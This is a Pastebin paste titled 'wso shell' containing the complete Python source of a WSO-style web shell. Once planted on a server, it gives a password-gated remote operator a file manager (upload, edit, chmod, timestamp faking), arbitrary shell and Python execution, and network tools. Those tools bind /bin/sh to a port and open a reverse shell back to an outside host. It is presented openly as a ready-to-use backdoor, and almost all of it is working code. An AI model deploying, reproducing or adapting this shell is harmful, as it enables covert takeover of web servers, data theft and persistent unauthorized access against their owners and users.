API tools faq
paste
Advertisement
Saint92

wso shell

Saint92
Mar 28th, 2016
728
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 20.59 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. import sys, os, cgi, commands, time, Cookie, socket
  3. from stat import *
  4. from datetime import datetime
  5. sys.stderr = open(os.devnull, 'w')
  6.  
  7. password = "0de664ecd2be02cdd54234a0d1229b43"
  8. version = "0.1 [py]"
  9.  
  10.  
  11. def getall(theform, nolist = False):
  12.     data = {}
  13.     for field in theform.keys():
  14.         if type(theform[field]) ==  type([]):
  15.             if not nolist:
  16.                 data[field] = theform.getlist(field)
  17.             else:
  18.                 data[field] = theform.getfirst(field)
  19.         elif theform[field].filename:
  20.             _FILES[field] = theform[field]
  21.         else:
  22.             data[field] = theform[field].value
  23.     return data
  24.  
  25. def escape(str):
  26.     return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n")
  27.  
  28. _FILES = {}
  29. _REQUEST = getall( cgi.FieldStorage() )
  30. if _REQUEST.has_key('charset') == False:
  31.     _REQUEST['charset'] = "Windows-1251"
  32. if _REQUEST.has_key('a') == False:
  33.     _REQUEST['a'] = "files"
  34. if _REQUEST.has_key('c') == False:
  35.     _REQUEST['c'] = os.getcwd()
  36. if _REQUEST.has_key('p1') == False:
  37.     _REQUEST['p1'] = ""
  38. if _REQUEST.has_key('p2') == False:
  39.     _REQUEST['p2'] = ""
  40. if _REQUEST.has_key('p3') == False:
  41.     _REQUEST['p3'] = ""
  42.  
  43. _COOKIE = Cookie.SimpleCookie()
  44. try:
  45.     _COOKIE.load(os.environ["HTTP_COOKIE"])
  46. except:
  47.     pass
  48.  
  49. def printLogin():
  50.     _COOKIE['psswd'] = "";
  51.     print _COOKIE;
  52.     print "Content-type: text/html\n";
  53.     print """<center><form method=post>Password: <input type=password name=psswd><input type=submit value='&gt;&gt;'></form></center>"""
  54.     exit()
  55.  
  56. if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 :
  57.     if _COOKIE['psswd'].value != password:
  58.         printLogin()
  59. elif _REQUEST.has_key('psswd'):
  60.         try:
  61.             import hashlib
  62.             psswd = hashlib.md5()
  63.         except:
  64.             import md5
  65.             psswd = md5.new()
  66.         psswd.update(_REQUEST['psswd'])
  67.         if psswd.hexdigest() != password:
  68.             printLogin()
  69.         else:
  70.             _COOKIE['psswd'] = psswd.hexdigest()
  71. else:
  72.     printLogin()
  73.  
  74. print _COOKIE
  75. home_dir = os.getcwd()
  76.  
  77. try:
  78.     os.chdir(_REQUEST['c'])
  79. except os.error, msg:
  80.     pass
  81.  
  82. cwd = os.getcwd();
  83. if cwd[-1] != '/':
  84.     cwd += '/'
  85.  
  86. def printHeader():
  87.     print "Content-type: text/html\n";
  88.     print "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" + _REQUEST['charset'] + "'><title>" + os.environ["SERVER_NAME"] + " - WSO " + version + """</title>
  89.    <style>
  90.        body{background-color:#444;color:#e1e1e1;}
  91.        body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  92.        table.info{ color:#fff;background-color:#222; }
  93.        span,h1,a{ color:#df5 !important; }
  94.        span{ font-weight: bolder; }
  95.        h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  96.        div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  97.        a{ text-decoration:none; }
  98.        a:hover{ text-decoration:underline; }
  99.        .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  100.        .bigarea{ width:100%;height:250px; }
  101.        input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,"Courier New"; }
  102.        form{ margin:0px; }
  103.        #toolsTbl{ text-align:center; }
  104.        .toolsInp{ width: 300px }
  105.        .main th{text-align:left;background-color:#5e5e5e;}
  106.        .main tr:hover{background-color:#5e5e5e}
  107.        .l1{background-color:#444}
  108.        pre,.m{font-family:Courier,Monospace;}
  109.    </style>
  110.    <script>
  111.        var c_ = '""" + escape(_REQUEST['c']) + """';
  112.        var a_ = '""" + escape(_REQUEST['a']) + """';
  113.        var p1_ = '""" + escape(_REQUEST['p1']) + """';
  114.        var p2_ = '""" + escape(_REQUEST['p2']) + """';
  115.        var p3_ = '""" + escape(_REQUEST['p3']) + """';
  116.        var charset_ = '""" + escape( _REQUEST['charset'] ) + """';
  117.        function g(a,c,p1,p2,p3,charset) {
  118.            if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
  119.            if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
  120.            if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
  121.            if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
  122.            if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
  123.            if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
  124.            document.mf.submit();
  125.        }
  126.    </script>
  127.    <head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
  128.    <form method=post name=mf style='display:none;'>
  129.    <input type=hidden name=a>
  130.    <input type=hidden name=c>
  131.    <input type=hidden name=p1>
  132.    <input type=hidden name=p2>
  133.    <input type=hidden name=p3>
  134.    <input type=hidden name=charset>
  135.    </form>"""
  136.     print '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Time:<br>Cwd:</span></td>'
  137.     print '<td><nobr>'
  138.     for x in os.uname():
  139.         sys.stdout.write(x+' ')
  140.     t = time.localtime()
  141.     print '</nobr><br>%s<br>%d-%.2d-%.2d %.2d:%.2d:%.2d <span>Server IP:</span> %s <span>Client IP:</span> %s<br>' %( commands.getoutput( 'id' ), t[0], t[1], t[2], t[3], t[4], t[5], os.environ['SERVER_ADDR'], os.environ['REMOTE_ADDR'])
  142.     path = ''
  143.     paths = cwd.split('/')
  144.     paths.pop()
  145.     for x in paths:
  146.         path += x + '/'
  147.         sys.stdout.write("""<a href="#" onclick="g('files','"""+escape(path)+"""', '', '', '')">"""+x+"""/</a>""")
  148.     print " " + permsColor(cwd),"""<a href='#' onclick="g('files','"""+ escape( home_dir ) +"""', '', '', '')">[ home ]</a>"""
  149.     charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866']
  150.     print '<td width=1 align=right><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'
  151.     for charset in charsets:
  152.         sys.stdout.write('<option value="%s" ' % charset)
  153.         if _REQUEST['charset'] == charset:
  154.              sys.stdout.write('selected')
  155.         sys.stdout.write('>%s</option>' % charset)
  156.     print '</optgroup></select><br></td></tr></table><table style="border-top:2px solid #333;text-align: center;" cellpadding=3 cellspacing=0 width=100%><tr>'
  157.     for x in ['Files', 'Console', 'Python', 'Network']:
  158.         print "<td width='100px'>[ <a href='#' onclick='g(\""+x.lower()+'", null, "", "", "")\'>'+x+'</a> ]</td>'
  159.     print '<td></td></tr></table><div style="margin:5">'
  160.  
  161. def printFooter():
  162.     if os.access (cwd, os.W_OK):
  163.         writable = "<font color=green>[ Writeable ]</font>"
  164.     else:
  165.         writable = "<font color=red>[ Not writable ]</font>"
  166.     print """</div>
  167. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style="border-top:2px solid #333;border-bottom:2px solid #333;">
  168.     <tr>
  169.         <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value='""" + cwd + """'><input type=submit value="&gt;&gt;"></form></td>
  170.         <td><form onsubmit="g('fileTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form></td>
  171.     </tr>
  172.     <tr>
  173.         <td><form onsubmit="g('files',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  174.         <td><form onsubmit="g('fileTools',null,this.f.value,'save','');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  175.     </tr>
  176.     <tr>
  177.         <td><form onsubmit="g('console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value="&gt;&gt;"></form></td>
  178.         <td><form method='post' ENCTYPE='multipart/form-data'>
  179.         <input type=hidden name=a value='files'>
  180.         <input type=hidden name=c value='"""+cwd+"""'>
  181.         <input type=hidden name=p1 value='uploadFile'>
  182.         <input type=hidden name=charset value='"""+_REQUEST['charset']+"""'>
  183.         <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  184.     </tr>
  185.  
  186. </table>
  187. </div>
  188. </body></html>"""
  189.  
  190. def viewSize(s):
  191.     if s >= 1073741824:
  192.         return "%1.2f  GB" % (s / 1073741824.0);
  193.     elif s >= 1048576:
  194.         return "%1.2f  MB" % (s / 1048576.0);
  195.     elif s >= 1024:
  196.         return "%1.2f  KB" % (s / 1024.0);
  197.     else:
  198.         return str(s) + ' B';
  199.  
  200. def perms(p):
  201.     mode = os.lstat(p)[ST_MODE]
  202.     p = mode
  203.     i="";
  204.     if (p & 0xC000) == 0xC000:
  205.         i = 's'
  206.     elif (p & 0xA000) == 0xA000:
  207.         i = 'l'
  208.     elif (p & 0x8000) == 0x8000:
  209.         i = '-'
  210.     elif (p & 0x6000) == 0x6000:
  211.         i = 'b'
  212.     elif (p & 0x4000) == 0x4000:
  213.         i = 'd'
  214.     elif (p & 0x2000) == 0x2000:
  215.         i = 'c'
  216.     elif (p & 0x1000) == 0x1000:
  217.         i = 'p'
  218.     else:
  219.         i = 'u'
  220.     if p & 0x0100: i += 'r'
  221.     else: i += '-'
  222.     if p & 0x0080: i += 'w'
  223.     else: i += '-'
  224.     if  p & 0x0040:
  225.         if p & 0x0800: i += 's'
  226.         else: i += 'x'
  227.     else:
  228.         if p & 0x0800: i += 'S'
  229.         else: i+='-'
  230.     if p & 0x0020: i += 'r'
  231.     else: i += '-'
  232.     if p & 0x0010: i += 'w'
  233.     else: i += '-'
  234.     if  p & 0x0008:
  235.         if p & 0x0400: i += 's'
  236.         else: i += 'x'
  237.     else:
  238.         if p & 0x0400: i += 'S'
  239.         else: i += '-'
  240.     if p & 0x0004: i += 'r'
  241.     else: i += '-'
  242.     if p & 0x0002: i += 'w'
  243.     else: i += '-'
  244.     if  p & 0x0001:
  245.         if p & 0x0200: i += 't'
  246.         else: i += 'x'
  247.     else:
  248.         if p & 0x0200: i += 'T'
  249.         else: i += '-'
  250.  
  251.     return i;
  252.  
  253. def permsColor(path):
  254.     if not os.access (path, os.R_OK):
  255.         return "<font color='#FF0000'>"+perms(path)+"</font>"
  256.     elif os.access (path, os.W_OK):
  257.         return "<font color='#00BB00'>"+perms(path)+"</font>"
  258.     else:
  259.         return "<font color='white'>"+perms(path)+"</font>"
  260.  
  261. def actionConsole():
  262.     printHeader()
  263.     print "<h1>Console</h1><div class=content>"
  264.     print """<form name="cf" onSubmit="g(null, null, this.cmd.value);return false;" style="border:1px solid #df5;background-color:#555;"><textarea class=bigarea style="border:0px;" readonly>"""
  265.     if len(_REQUEST['p1']) > 0:
  266.         print '$', cgi.escape(_REQUEST['p1'])
  267.         print cgi.escape(commands.getoutput(_REQUEST['p1']))
  268.  
  269.     print '</textarea><table cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;"></td></tr></table>'
  270.     print "</form></div><script>document.cf.cmd.focus();</script>"
  271.     printFooter()
  272.  
  273. def actionFiles():
  274.     printHeader()
  275.     if _REQUEST['p1'] == 'uploadFile':
  276.         try:
  277.             if _FILES['f'].filename:
  278.                 fn = os.path.basename(_FILES['f'].filename)
  279.                 open(fn, 'wb').write(_FILES['f'].file.read())
  280.         except: pass
  281.     if _REQUEST['p1'] == 'mkdir':
  282.         try: os.mkdir(_REQUEST['p2'])
  283.         except: pass
  284.     print "<h1>File manager</h1><div class=content>"
  285.     item_stat = os.lstat('..')
  286.  
  287.     def dirItemInfo(name, item_stat):
  288.         if S_ISLNK(item_stat[ST_MODE]):
  289.             type = "link"
  290.         else:
  291.             type = "dir"
  292.         tmp = {
  293.                 'name'  : name,
  294.                 'path'  : os.path.join(cwd, name),
  295.                 'size'  : viewSize(item_stat[ST_SIZE]),
  296.                 'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"),
  297.                 'uid'   : str(item_stat[ST_UID]),
  298.                 'gid'   : str(item_stat[ST_GID]),
  299.                 'perms' : permsColor(name),
  300.                 'type'  : type
  301.               }
  302.         return tmp
  303.     dirs = [dirItemInfo('..', os.lstat('..'))]
  304.     files = []
  305.  
  306.     for item in os.listdir(cwd):
  307.         item_stat = os.lstat(item)
  308.         mode = item_stat[ST_MODE]
  309.         tmp = dirItemInfo(item, item_stat)
  310.         if S_ISLNK(mode) or S_ISDIR(mode):
  311.             dirs.append(tmp)
  312.         elif S_ISREG(mode):
  313.             files.append(tmp)
  314.  
  315.     print "<table width='100%' class='main' cellspacing='0' cellpadding='2'><form method='post'>"
  316.     print """<tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>""";
  317.    
  318.     def sort(a, b):
  319.         return cmp(a['name'].lower(), b['name'].lower())
  320.  
  321.     line = 0
  322.     for item in sorted(dirs, sort):
  323.         print "<tr"
  324.         if line:
  325.             print " class=l1"
  326.         print "><td><a href='#' onclick='g(null,\""+escape(item['path'])+"\")'><b>[ "+cgi.escape(item['name'])+" ]</b></a></td><td>"+item['type']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'chmod')\">"+item['perms']+"</a></td>"
  327.         print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a></td></tr>"
  328.         line = (line + 1)%2
  329.     for item in sorted(files, sort):
  330.         print "<tr"
  331.         if line:
  332.             print " class=l1"
  333.         print "><td><a href='#' onclick='g(\"fileTools\",null,\""+escape(item['name'])+"\")'>"+cgi.escape(item['name'])+"</a></td><td>"+item['size']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['path'])+"', 'chmod')\">"+item['perms']+"</a></td>"
  334.         print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'edit')\">E</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'download')\">D</a></td></tr>"
  335.         line = (line + 1)%2
  336.  
  337.     print "</form></table></div>"
  338.     printFooter()
  339.  
  340. def actionFileTools():
  341.     if _REQUEST['p2'] == "":
  342.         _REQUEST['p2'] = "view"
  343.     if _REQUEST['p2'] == "download":
  344.         print "Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n"
  345.         try:
  346.             fp = open(_REQUEST['p1'], 'rb')
  347.             for x in fp.readlines():
  348.                 sys.stdout.write(x)
  349.             fp.close()
  350.         except: pass
  351.         return
  352.     if _REQUEST['p2'] == "save":
  353.         try:
  354.             fp = open(_REQUEST['p1'], 'w')
  355.             fp.write(_REQUEST['p3'])
  356.             fp.close()
  357.         except: pass
  358.         _REQUEST['p2'] = 'edit'
  359.     printHeader()
  360.     print "<h1>File tools</h1><div class=content>"
  361.     item_stat = os.stat(_REQUEST['p1'])
  362.     print "<span>File: </span>" + os.path.basename(_REQUEST['p1']) + " <span>Size: </span> " +viewSize(item_stat[ST_SIZE]) + " <span>Permission:</span> " +permsColor(_REQUEST['p1'])
  363.     print "<br/>"
  364.     if S_ISDIR(item_stat[ST_MODE]):
  365.         menu = ['Chmod', 'Rename', 'Touch']
  366.     else:
  367.         menu = ['View', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch']
  368.     for x in menu:
  369.         print "<a href=# onclick=\"g(null, null, null, '"+x.lower()+"')\">"
  370.         if x.lower() == _REQUEST['p2']:
  371.             print "<b>[ " + x + " ]</b>"
  372.         else:
  373.             print x
  374.         print "</a> "
  375.     print "<br><br>";
  376.     if _REQUEST['p2'] == "view":
  377.         try:
  378.             fp = open(_REQUEST['p1'], 'r')
  379.             print "<pre class=ml1>"
  380.             for x in fp.readlines():
  381.                 sys.stdout.write(cgi.escape(x))
  382.             fp.close()
  383.             print "</pre>"
  384.         except:
  385.             print "Can't open file! "+_REQUEST['p1']
  386.     if _REQUEST['p2'] == "edit":
  387.         try:
  388.             fp = open(_REQUEST['p1'], 'r')
  389.             print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'save', this.f.value);return false;\"><textarea name=f class=bigarea>"
  390.             for x in fp.readlines():
  391.                 sys.stdout.write(cgi.escape(x))
  392.             fp.close()
  393.             print "</textarea><input type='submit' value='&gt;&gt;'></form>"
  394.         except:
  395.             print "Can't open (create) file! "+_REQUEST['p1']
  396.     if _REQUEST['p2'] == "chmod":
  397.         import stat, string
  398.         if len(_REQUEST['p3']):
  399.             perm = string.atoi(_REQUEST['p3'], 8)
  400.             try:
  401.                 os.chmod(_REQUEST['p1'], perm)
  402.                 print "Done"
  403.             except: print "Fail!"
  404.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'chmod', this.p.value);return false;\"><input type='text' name='p' value='"
  405.         print "%o" % stat.S_IMODE(os.stat(_REQUEST['p1'])[ST_MODE])
  406.         print "'/><input type='submit' value='&gt;&gt;'></form>"
  407.     if _REQUEST['p2'] == "rename":
  408.         if len(_REQUEST['p3']):
  409.             try:
  410.                 os.rename(_REQUEST['p1'], _REQUEST['p3'])
  411.                 _REQUEST['p1'] = _REQUEST['p3']
  412.                 print "Done<script>p2_='" + escape(_REQUEST['p3']) + "'</script>"
  413.             except: print "Fail!"
  414.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'rename', this.n.value);return false;\"><input type='text' name='n' value='" + escape(_REQUEST['p1'])+ "'/><input type='submit' value='&gt;&gt;'></form>"
  415.  
  416.     if _REQUEST['p2'] == "touch":
  417.         if len(_REQUEST['p3']):
  418.             try:
  419.                 tmstmp = time.mktime(time.strptime(_REQUEST['p3'], "%Y-%m-%d %H:%M:%S"))
  420.                 os.utime(_REQUEST['p1'], (tmstmp, tmstmp))
  421.                 item_stat = os.stat(_REQUEST['p1'])
  422.                 print "Done"
  423.             except: print "Fail!"
  424.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'touch', this.n.value);return false;\"><input type='text' name='n' value='"
  425.         print datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S")
  426.         print "'/><input type='submit' value='&gt;&gt;'></form>"
  427.  
  428.     print "</div>"
  429.     printFooter()
  430.  
  431. def actionPython():
  432.     printHeader()
  433.     print "<h1>Exec python code</h1><div class=content>"
  434.     print """<form name="cf" onSubmit="g(null, null, this.c.value);return false;"><textarea class=bigarea name=c>"""
  435.     print '</textarea><input type=submit value="&gt;&gt;">'
  436.     if len(_REQUEST['p1']) > 0:
  437.         print '<pre class="ml1" style="margin-top:5px;">'
  438.         try:
  439.             import StringIO
  440.             old_stdout = sys.stdout
  441.             sys.stdout = StringIO.StringIO()
  442.             exec(_REQUEST['p1'])
  443.             data = sys.stdout.getvalue()
  444.             sys.stdout = old_stdout
  445.             print cgi.escape(data)
  446.         except:
  447.             pass
  448.         print '</pre>'
  449.     print "</form></div>"
  450.     printFooter()
  451.  
  452. def actionNetwork():
  453.     printHeader()
  454.     print """<h1>Network tools</h1><div class=content>
  455.    <form name='nfp' onSubmit="g(null,null,'bp',this.port.value);return false;">
  456.     <span>Bind port to /bin/sh</span><br/>
  457.     Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
  458.     </form>
  459.     <form name='nfp' onSubmit="g(null,null,'bc',this.server.value,this.port.value);return false;">
  460.     <span>Back-connect to</span><br/>
  461.     Server: <input type='text' name='server' value='"""+os.environ['REMOTE_ADDR']+"""'> Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
  462.     </form><br>"""
  463.     if _REQUEST['p1'] != "":
  464.         sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  465.         sock.settimeout(10)
  466.     if _REQUEST['p1'] == "bp":
  467.         try:
  468.             sock.bind(('localhost', int(_REQUEST['p2'])))
  469.             sock.listen(0)
  470.         except:
  471.             print "error"
  472.         else:
  473.             print "done"
  474.         if os.fork()!=0:
  475.             (c,addr)=sock.accept()
  476.             os.dup2(c.fileno(), 0)
  477.             os.dup2(c.fileno(), 1)
  478.             os.dup2(c.fileno(), 2)
  479.             os.system('/bin/sh -i')
  480.             c.shutdown(2)
  481.             sock.shutdown(2)
  482.     elif _REQUEST['p1'] == "bc":
  483.         try:
  484.             sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) )
  485.         except:
  486.             print "error"
  487.         else:
  488.             print "done"
  489.             if os.fork()!=0:
  490.                 os.dup2(sock.fileno(), 0)
  491.                 os.dup2(sock.fileno(), 1)
  492.                 os.dup2(sock.fileno(), 2)
  493.                 os.system('/bin/sh -i')
  494.                 sock.shutdown(2)
  495.     print "</div>"
  496.     printFooter()
  497.  
  498.  
  499. try:
  500.     {
  501.         'files' : actionFiles,
  502.         'fileTools' : actionFileTools,
  503.         'console' : actionConsole,
  504.         'python' : actionPython,
  505.         'network' : actionNetwork
  506.     }[_REQUEST['a']]()
  507. except KeyError:
  508.     printHeader()
  509.     printFooter()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!